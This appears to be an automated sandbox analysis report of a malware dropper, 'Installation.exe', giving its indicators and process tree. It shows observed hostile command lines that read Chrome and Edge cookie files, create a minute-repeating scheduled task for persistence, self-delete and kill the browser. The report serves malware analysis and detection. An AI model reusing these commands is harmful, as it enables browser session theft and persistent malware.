3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Installation.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	124	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	131	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 50 IoCs

Processes:

Installation.exeRQyeriXUzbRUpPrL7q0uoZxg.exelTXLmvNBf0jFOlxVzf5b6h0M.exeWerFault.exe

pid	process
1032	Installation.exe
1032	Installation.exe
4180	RQyeriXUzbRUpPrL7q0uoZxg.exe
4180	RQyeriXUzbRUpPrL7q0uoZxg.exe
4180	RQyeriXUzbRUpPrL7q0uoZxg.exe
4180	RQyeriXUzbRUpPrL7q0uoZxg.exe
1532	lTXLmvNBf0jFOlxVzf5b6h0M.exe
1532	lTXLmvNBf0jFOlxVzf5b6h0M.exe
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
4656	WerFault.exe
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740
2740

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

lTXLmvNBf0jFOlxVzf5b6h0M.exe

pid process

1532 lTXLmvNBf0jFOlxVzf5b6h0M.exe

pid	process
1532	lTXLmvNBf0jFOlxVzf5b6h0M.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

rFfsJNZOJHzkKLnTS_HALQcK.exe6rcEO38NHZTK8OJiN8hG_cJq.exeWerFault.exeXSyzdtGnOb1hrK_pxtgF9AbN.exeWyjfPqhY1m56uNFU3O157f9W.exebdEn9O4KywO22OwQREE86uvA.exe

description	pid	process
Token: SeDebugPrivilege	3180	rFfsJNZOJHzkKLnTS_HALQcK.exe
Token: SeDebugPrivilege	3036	6rcEO38NHZTK8OJiN8hG_cJq.exe
Token: SeRestorePrivilege	4656	WerFault.exe
Token: SeBackupPrivilege	4656	WerFault.exe
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeShutdownPrivilege	2740
Token: SeCreatePagefilePrivilege	2740
Token: SeDebugPrivilege	4656	WerFault.exe
Token: SeDebugPrivilege	3976	XSyzdtGnOb1hrK_pxtgF9AbN.exe
Token: SeDebugPrivilege	4116	WyjfPqhY1m56uNFU3O157f9W.exe
Token: SeDebugPrivilege	4108	bdEn9O4KywO22OwQREE86uvA.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

LxaY8x7rjUw_HhsZOQerw9D_.tmp

pid process

4716 LxaY8x7rjUw_HhsZOQerw9D_.tmp

pid	process
4716	LxaY8x7rjUw_HhsZOQerw9D_.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Installation.exe

description	pid	process	target process
PID 1032 wrote to memory of 3976	1032	Installation.exe	XSyzdtGnOb1hrK_pxtgF9AbN.exe
PID 1032 wrote to memory of 3976	1032	Installation.exe	XSyzdtGnOb1hrK_pxtgF9AbN.exe
PID 1032 wrote to memory of 3976	1032	Installation.exe	XSyzdtGnOb1hrK_pxtgF9AbN.exe
PID 1032 wrote to memory of 3968	1032	Installation.exe	4oeFz3mEaXqXQKG4J9y10H2a.exe
PID 1032 wrote to memory of 3968	1032	Installation.exe	4oeFz3mEaXqXQKG4J9y10H2a.exe
PID 1032 wrote to memory of 3968	1032	Installation.exe	4oeFz3mEaXqXQKG4J9y10H2a.exe
PID 1032 wrote to memory of 3036	1032	Installation.exe	6rcEO38NHZTK8OJiN8hG_cJq.exe
PID 1032 wrote to memory of 3036	1032	Installation.exe	6rcEO38NHZTK8OJiN8hG_cJq.exe
PID 1032 wrote to memory of 2224	1032	Installation.exe	JUwjTZwE7MJ3xBFHQPGTlDSL.exe
PID 1032 wrote to memory of 2224	1032	Installation.exe	JUwjTZwE7MJ3xBFHQPGTlDSL.exe
PID 1032 wrote to memory of 2224	1032	Installation.exe	JUwjTZwE7MJ3xBFHQPGTlDSL.exe
PID 1032 wrote to memory of 3824	1032	Installation.exe	5pOKhIT9xzpAqqlOFhGowWzI.exe
PID 1032 wrote to memory of 3824	1032	Installation.exe	5pOKhIT9xzpAqqlOFhGowWzI.exe
PID 1032 wrote to memory of 3824	1032	Installation.exe	5pOKhIT9xzpAqqlOFhGowWzI.exe
PID 1032 wrote to memory of 3180	1032	Installation.exe	rFfsJNZOJHzkKLnTS_HALQcK.exe
PID 1032 wrote to memory of 3180	1032	Installation.exe	rFfsJNZOJHzkKLnTS_HALQcK.exe
PID 1032 wrote to memory of 3956	1032	Installation.exe	wo0EgEORYQVnTz_IQXwD4sCf.exe
PID 1032 wrote to memory of 3956	1032	Installation.exe	wo0EgEORYQVnTz_IQXwD4sCf.exe
PID 1032 wrote to memory of 3844	1032	Installation.exe	R7nQtc22iv7x6NzKf74TTP8I.exe
PID 1032 wrote to memory of 3844	1032	Installation.exe	R7nQtc22iv7x6NzKf74TTP8I.exe
PID 1032 wrote to memory of 3844	1032	Installation.exe	R7nQtc22iv7x6NzKf74TTP8I.exe
PID 1032 wrote to memory of 3868	1032	Installation.exe	_o9gi1GRhga6_puQJ7zRO6od.exe
PID 1032 wrote to memory of 3868	1032	Installation.exe	_o9gi1GRhga6_puQJ7zRO6od.exe
PID 1032 wrote to memory of 3868	1032	Installation.exe	_o9gi1GRhga6_puQJ7zRO6od.exe
PID 1032 wrote to memory of 3860	1032	Installation.exe	ewWpoQUM_MjaV3hD1P1xzDPI.exe
PID 1032 wrote to memory of 3860	1032	Installation.exe	ewWpoQUM_MjaV3hD1P1xzDPI.exe
PID 1032 wrote to memory of 3860	1032	Installation.exe	ewWpoQUM_MjaV3hD1P1xzDPI.exe
PID 1032 wrote to memory of 996	1032	Installation.exe	S48IMD8lcg20hyY87j07u4Cs.exe
PID 1032 wrote to memory of 996	1032	Installation.exe	S48IMD8lcg20hyY87j07u4Cs.exe
PID 1032 wrote to memory of 996	1032	Installation.exe	S48IMD8lcg20hyY87j07u4Cs.exe
PID 1032 wrote to memory of 1532	1032	Installation.exe	lTXLmvNBf0jFOlxVzf5b6h0M.exe
PID 1032 wrote to memory of 1532	1032	Installation.exe	lTXLmvNBf0jFOlxVzf5b6h0M.exe
PID 1032 wrote to memory of 1532	1032	Installation.exe	lTXLmvNBf0jFOlxVzf5b6h0M.exe
PID 1032 wrote to memory of 1548	1032	Installation.exe	eo6y0xbwwKcAuTsrneP6pHxG.exe
PID 1032 wrote to memory of 1548	1032	Installation.exe	eo6y0xbwwKcAuTsrneP6pHxG.exe
PID 1032 wrote to memory of 1548	1032	Installation.exe	eo6y0xbwwKcAuTsrneP6pHxG.exe
PID 1032 wrote to memory of 1108	1032	Installation.exe	Lpjru175DWgoWMKocqFK7hyb.exe
PID 1032 wrote to memory of 1108	1032	Installation.exe	Lpjru175DWgoWMKocqFK7hyb.exe
PID 1032 wrote to memory of 1108	1032	Installation.exe	Lpjru175DWgoWMKocqFK7hyb.exe
PID 1032 wrote to memory of 3816	1032	Installation.exe	e3Fv6PFQskl6bjXrVlHOqUx_.exe
PID 1032 wrote to memory of 3816	1032	Installation.exe	e3Fv6PFQskl6bjXrVlHOqUx_.exe
PID 1032 wrote to memory of 3816	1032	Installation.exe	e3Fv6PFQskl6bjXrVlHOqUx_.exe
PID 1032 wrote to memory of 1568	1032	Installation.exe	gGG52pxF2TFO_Q_h8XETmDBc.exe
PID 1032 wrote to memory of 1568	1032	Installation.exe	gGG52pxF2TFO_Q_h8XETmDBc.exe
PID 1032 wrote to memory of 1568	1032	Installation.exe	gGG52pxF2TFO_Q_h8XETmDBc.exe
PID 1032 wrote to memory of 904	1032	Installation.exe	SciumA1BXCk6M_nzLEyomFvu.exe
PID 1032 wrote to memory of 904	1032	Installation.exe	SciumA1BXCk6M_nzLEyomFvu.exe
PID 1032 wrote to memory of 904	1032	Installation.exe	SciumA1BXCk6M_nzLEyomFvu.exe
PID 1032 wrote to memory of 4108	1032	Installation.exe	bdEn9O4KywO22OwQREE86uvA.exe
PID 1032 wrote to memory of 4108	1032	Installation.exe	bdEn9O4KywO22OwQREE86uvA.exe
PID 1032 wrote to memory of 4108	1032	Installation.exe	bdEn9O4KywO22OwQREE86uvA.exe
PID 1032 wrote to memory of 4116	1032	Installation.exe	WyjfPqhY1m56uNFU3O157f9W.exe
PID 1032 wrote to memory of 4116	1032	Installation.exe	WyjfPqhY1m56uNFU3O157f9W.exe
PID 1032 wrote to memory of 4116	1032	Installation.exe	WyjfPqhY1m56uNFU3O157f9W.exe
PID 1032 wrote to memory of 4132	1032	Installation.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
PID 1032 wrote to memory of 4132	1032	Installation.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
PID 1032 wrote to memory of 4132	1032	Installation.exe	EUqOKCpxDpaD3rzZoEDUIwyy.exe
PID 1032 wrote to memory of 4144	1032	Installation.exe	lqOYAxpB6w51BFdYBOd0Sg85.exe
PID 1032 wrote to memory of 4144	1032	Installation.exe	lqOYAxpB6w51BFdYBOd0Sg85.exe
PID 1032 wrote to memory of 4144	1032	Installation.exe	lqOYAxpB6w51BFdYBOd0Sg85.exe
PID 1032 wrote to memory of 4168	1032	Installation.exe	LxaY8x7rjUw_HhsZOQerw9D_.exe
PID 1032 wrote to memory of 4168	1032	Installation.exe	LxaY8x7rjUw_HhsZOQerw9D_.exe
PID 1032 wrote to memory of 4168	1032	Installation.exe	LxaY8x7rjUw_HhsZOQerw9D_.exe
PID 1032 wrote to memory of 4180	1032	Installation.exe	RQyeriXUzbRUpPrL7q0uoZxg.exe

C:\Users\Admin\AppData\Local\Temp\Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Installation.exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1032

C:\Users\Admin\Documents\XSyzdtGnOb1hrK_pxtgF9AbN.exe
"C:\Users\Admin\Documents\XSyzdtGnOb1hrK_pxtgF9AbN.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3976

C:\Users\Admin\Documents\wo0EgEORYQVnTz_IQXwD4sCf.exe
"C:\Users\Admin\Documents\wo0EgEORYQVnTz_IQXwD4sCf.exe"
2⤵
- Executes dropped EXE
PID:3956

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:5092

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:5048

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:3836

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:4460

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3956 -s 792
3⤵
- Program crash
PID:5672

C:\Users\Admin\Documents\ewWpoQUM_MjaV3hD1P1xzDPI.exe
"C:\Users\Admin\Documents\ewWpoQUM_MjaV3hD1P1xzDPI.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3860

C:\Users\Admin\Documents\ewWpoQUM_MjaV3hD1P1xzDPI.exe
C:\Users\Admin\Documents\ewWpoQUM_MjaV3hD1P1xzDPI.exe
3⤵
- Executes dropped EXE
PID:4100

C:\Users\Admin\Documents\_o9gi1GRhga6_puQJ7zRO6od.exe
"C:\Users\Admin\Documents\_o9gi1GRhga6_puQJ7zRO6od.exe"
2⤵
- Executes dropped EXE
PID:3868

C:\Users\Admin\Documents\_o9gi1GRhga6_puQJ7zRO6od.exe
"C:\Users\Admin\Documents\_o9gi1GRhga6_puQJ7zRO6od.exe"
3⤵
PID:1252

C:\Users\Admin\Documents\R7nQtc22iv7x6NzKf74TTP8I.exe
"C:\Users\Admin\Documents\R7nQtc22iv7x6NzKf74TTP8I.exe"
2⤵
- Executes dropped EXE
PID:3844

C:\Users\Admin\Documents\R7nQtc22iv7x6NzKf74TTP8I.exe
"C:\Users\Admin\Documents\R7nQtc22iv7x6NzKf74TTP8I.exe"
3⤵
PID:4940

C:\Users\Admin\Documents\rFfsJNZOJHzkKLnTS_HALQcK.exe
"C:\Users\Admin\Documents\rFfsJNZOJHzkKLnTS_HALQcK.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3180

C:\Users\Admin\Documents\5pOKhIT9xzpAqqlOFhGowWzI.exe
"C:\Users\Admin\Documents\5pOKhIT9xzpAqqlOFhGowWzI.exe"
2⤵
- Executes dropped EXE
PID:3824

C:\Users\Admin\Documents\4oeFz3mEaXqXQKG4J9y10H2a.exe
"C:\Users\Admin\Documents\4oeFz3mEaXqXQKG4J9y10H2a.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3968

C:\Users\Admin\Documents\4oeFz3mEaXqXQKG4J9y10H2a.exe
C:\Users\Admin\Documents\4oeFz3mEaXqXQKG4J9y10H2a.exe
3⤵
- Executes dropped EXE
PID:3952

C:\Users\Admin\Documents\6rcEO38NHZTK8OJiN8hG_cJq.exe
"C:\Users\Admin\Documents\6rcEO38NHZTK8OJiN8hG_cJq.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3036

C:\Users\Admin\AppData\Roaming\2498614.exe
"C:\Users\Admin\AppData\Roaming\2498614.exe"
3⤵
PID:4484

C:\Users\Admin\AppData\Roaming\6738548.exe
"C:\Users\Admin\AppData\Roaming\6738548.exe"
3⤵
PID:848

C:\Users\Admin\Documents\JUwjTZwE7MJ3xBFHQPGTlDSL.exe
"C:\Users\Admin\Documents\JUwjTZwE7MJ3xBFHQPGTlDSL.exe"
2⤵
- Executes dropped EXE
PID:2224

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\JUwjTZwE7MJ3xBFHQPGTlDSL.exe"
3⤵
PID:6564

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:6988

C:\Users\Admin\AppData\Local\Temp\PB8yEtUmQP.exe
"C:\Users\Admin\AppData\Local\Temp\PB8yEtUmQP.exe"
3⤵
PID:6556

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
4⤵
- Creates scheduled task(s)
PID:7012

C:\Users\Admin\Documents\lqOYAxpB6w51BFdYBOd0Sg85.exe
"C:\Users\Admin\Documents\lqOYAxpB6w51BFdYBOd0Sg85.exe"
2⤵
- Executes dropped EXE
PID:4144

C:\Users\Admin\Documents\EUqOKCpxDpaD3rzZoEDUIwyy.exe
"C:\Users\Admin\Documents\EUqOKCpxDpaD3rzZoEDUIwyy.exe"
2⤵
- Executes dropped EXE
PID:4132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 764
3⤵
- Program crash
PID:852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 780
3⤵
- Program crash
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 824
3⤵
- Program crash
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 792
3⤵
- Program crash
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 952
3⤵
- Program crash
PID:4440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1012
3⤵
- Program crash
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1012
3⤵
- Program crash
PID:2880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1440
3⤵
- Program crash
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1460
3⤵
- Program crash
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1504
3⤵
- Program crash
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1584
3⤵
- Program crash
PID:2172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1504
3⤵
- Program crash
PID:5048

C:\Users\Admin\Documents\WyjfPqhY1m56uNFU3O157f9W.exe
"C:\Users\Admin\Documents\WyjfPqhY1m56uNFU3O157f9W.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4116

C:\Users\Admin\Documents\bdEn9O4KywO22OwQREE86uvA.exe
"C:\Users\Admin\Documents\bdEn9O4KywO22OwQREE86uvA.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4108

C:\Users\Admin\Documents\eo6y0xbwwKcAuTsrneP6pHxG.exe
"C:\Users\Admin\Documents\eo6y0xbwwKcAuTsrneP6pHxG.exe"
2⤵
- Executes dropped EXE
PID:1548

C:\Users\Admin\Documents\eo6y0xbwwKcAuTsrneP6pHxG.exe
"C:\Users\Admin\Documents\eo6y0xbwwKcAuTsrneP6pHxG.exe"
3⤵
PID:6804

C:\Users\Admin\Documents\Lpjru175DWgoWMKocqFK7hyb.exe
"C:\Users\Admin\Documents\Lpjru175DWgoWMKocqFK7hyb.exe"
2⤵
- Executes dropped EXE
PID:1108

C:\Users\Admin\Documents\Lpjru175DWgoWMKocqFK7hyb.exe
"C:\Users\Admin\Documents\Lpjru175DWgoWMKocqFK7hyb.exe"
3⤵
PID:4836

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
4⤵
PID:4384

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
5⤵
PID:7092

C:\Users\Admin\Documents\e3Fv6PFQskl6bjXrVlHOqUx_.exe
"C:\Users\Admin\Documents\e3Fv6PFQskl6bjXrVlHOqUx_.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3816

C:\Users\Admin\Documents\e3Fv6PFQskl6bjXrVlHOqUx_.exe
C:\Users\Admin\Documents\e3Fv6PFQskl6bjXrVlHOqUx_.exe
3⤵
- Executes dropped EXE
PID:2056

C:\Users\Admin\Documents\SciumA1BXCk6M_nzLEyomFvu.exe
"C:\Users\Admin\Documents\SciumA1BXCk6M_nzLEyomFvu.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:904

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
3⤵
PID:4608

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:4900

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:5044

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:5528

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5376

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5880

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:6040

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:5984

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:5760

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
PID:4300

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
3⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:816

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:3044

C:\Users\Admin\Documents\gGG52pxF2TFO_Q_h8XETmDBc.exe
"C:\Users\Admin\Documents\gGG52pxF2TFO_Q_h8XETmDBc.exe"
2⤵
- Executes dropped EXE
PID:1568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 716
3⤵
- Program crash
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 696
3⤵
- Program crash
PID:3344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 664
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 780
3⤵
- Program crash
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 1056
3⤵
- Program crash
PID:4368

C:\Users\Admin\Documents\S48IMD8lcg20hyY87j07u4Cs.exe
"C:\Users\Admin\Documents\S48IMD8lcg20hyY87j07u4Cs.exe"
2⤵
- Executes dropped EXE
PID:996

C:\Users\Admin\Documents\S48IMD8lcg20hyY87j07u4Cs.exe
"C:\Users\Admin\Documents\S48IMD8lcg20hyY87j07u4Cs.exe" -q
3⤵
PID:4844

C:\Users\Admin\Documents\lTXLmvNBf0jFOlxVzf5b6h0M.exe
"C:\Users\Admin\Documents\lTXLmvNBf0jFOlxVzf5b6h0M.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1532

C:\Users\Admin\Documents\LxaY8x7rjUw_HhsZOQerw9D_.exe
"C:\Users\Admin\Documents\LxaY8x7rjUw_HhsZOQerw9D_.exe"
2⤵
- Executes dropped EXE
PID:4168

C:\Users\Admin\AppData\Local\Temp\is-FQMV5.tmp\LxaY8x7rjUw_HhsZOQerw9D_.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FQMV5.tmp\LxaY8x7rjUw_HhsZOQerw9D_.tmp" /SL5="$4007C,138429,56832,C:\Users\Admin\Documents\LxaY8x7rjUw_HhsZOQerw9D_.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4716

C:\Users\Admin\AppData\Local\Temp\is-QEHIF.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QEHIF.tmp\Setup.exe" /Verysilent
4⤵
PID:852

C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
5⤵
PID:2392

C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
6⤵
PID:5640

C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
6⤵
PID:5164

C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
5⤵
PID:184

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628855136 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
6⤵
PID:6220

C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"
5⤵
PID:5168

C:\Users\Admin\AppData\Roaming\6977173.exe
"C:\Users\Admin\AppData\Roaming\6977173.exe"
6⤵
PID:5880

C:\Users\Admin\AppData\Roaming\3382676.exe
"C:\Users\Admin\AppData\Roaming\3382676.exe"
6⤵
PID:4192

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
7⤵
PID:5400

C:\Users\Admin\AppData\Roaming\1376072.exe
"C:\Users\Admin\AppData\Roaming\1376072.exe"
6⤵
PID:4824

C:\Users\Admin\AppData\Roaming\5362864.exe
"C:\Users\Admin\AppData\Roaming\5362864.exe"
6⤵
PID:5584

C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
5⤵
PID:5212

C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"
5⤵
PID:5244

C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a
6⤵
PID:5788

C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
5⤵
PID:5328

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:6372

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:6924

C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
5⤵
PID:5392

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628855136 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
6⤵
PID:6664

C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe
